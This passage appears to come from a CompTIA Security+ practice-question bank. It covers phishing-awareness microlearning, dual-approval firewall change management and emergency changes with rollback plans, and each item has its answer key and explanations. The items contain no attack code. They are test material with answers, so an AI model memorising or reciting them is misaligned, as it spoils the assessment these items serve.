Option A is correct because a short, targeted refresher directly addresses the specific mistake (entering credentials on a look-alike login page) without overwhelming users. This approach follows microlearning principles, which improve retention and reduce cognitive load compared with lengthy training, and it keeps time away from work to minutes. Option B is correct because an easy reporting button in the email client gives users a safe action to take when they are unsure: reporting instead of clicking, the security team seeing real phishing sooner, and reporting rates becoming a measurable outcome of the program. Together the two options correct the observed behavior and add a low-friction safe path, which is why they beat the punitive (D), disruptive (C) and overly broad (E) alternatives.

Exam trap

The trap here is that candidates may choose C (full-day course) thinking it is thorough, but CompTIA emphasizes that security awareness must be continuous, short, and relevant, not a one-time marathon that sacrifices usability for perceived completeness.

299
MCQmedium

An operations manager is worried a single network administrator could quietly push an unauthorized firewall rule. The manager wants every rule change reviewed by a second person and documented before implementation. Which control best addresses this concern?

A.Enable detailed firewall logging so each packet match is written to disk.
B.Require a documented change-management workflow with two approvers before any firewall rule is applied.
C.Move the firewall appliance into a locked equipment rack.
D.Encrypt the firewall configuration backup with a strong key.
AnswerB

Correct. A documented change-management process with dual approval is an administrative control that reduces insider risk and improves accountability. It creates separation of duties, adds review before implementation, and leaves an auditable trail. That combination directly addresses the manager's concern about a single administrator making hidden changes.

Why this answer

Option B is correct because a documented change-management workflow with two approvers directly enforces separation of duties, ensuring that no single administrator can implement a firewall rule change without peer review and documented approval. This control addresses the manager's concern about unauthorized changes by requiring a second person to review and approve before the rule is applied, which is a fundamental principle of access control and change management.

Exam trap

The trap here is that candidates may confuse detective controls (like logging) or physical controls (like locked racks) with preventive administrative controls, failing to recognize that only a documented approval workflow with two approvers directly enforces the required separation of duties to prevent unauthorized rule changes.

How to eliminate wrong answers

Option A is wrong because enabling detailed firewall logging records traffic matches after the fact, but it does not prevent a single administrator from pushing an unauthorized rule; it only provides forensic evidence. Option C is wrong because moving the firewall into a locked equipment rack provides physical security against tampering with the hardware, but it does not prevent a network administrator from remotely pushing unauthorized rule changes via the management interface. Option D is wrong because encrypting the firewall configuration backup protects the backup file from unauthorized access, but it does not control or review live rule changes made by an administrator.

300
MCQmedium

A developer finds a production bug on Friday afternoon. The fix has already passed staging, but the business wants the release to be reversible if the hotfix causes trouble. Which change-management practice best satisfies both speed and control?

A.Bypass change control so the patch reaches production immediately
B.Wait for the next normal change window next week
C.Use an emergency change with a documented rollback plan and approval
D.Freeze all production changes until the next monthly review meeting
AnswerC

An emergency change supports urgent deployment while preserving control through approval, testing evidence, and rollback steps.

Why this answer

Option C is correct because an emergency change with a documented rollback plan and approval provides the fastest path to production while maintaining control. This practice aligns with ITIL's emergency change advisory board (ECAB) process, which allows expedited approval for critical fixes while requiring a tested rollback procedure to ensure reversibility. The business's requirement for speed is met by bypassing the normal change window, and control is preserved through mandatory documentation and approval.

Exam trap

The trap here is that candidates may assume 'speed' means 'no process at all' (Option A), but CompTIA tests the understanding that emergency change procedures are designed to balance speed with control, not eliminate it.

How to eliminate wrong answers

Option A is wrong because bypassing change control entirely violates security governance and could lead to unauthorized changes, configuration drift, and audit failures; it sacrifices all control for speed. Option B is wrong because waiting for the next normal change window (e.g., a weekly maintenance window) fails to meet the business's need for speed, as the bug is in production and causing issues now. Option D is wrong because freezing all production changes until the next monthly review meeting is overly restrictive, preventing even this critical hotfix from being deployed, and does not address the need for a reversible release.
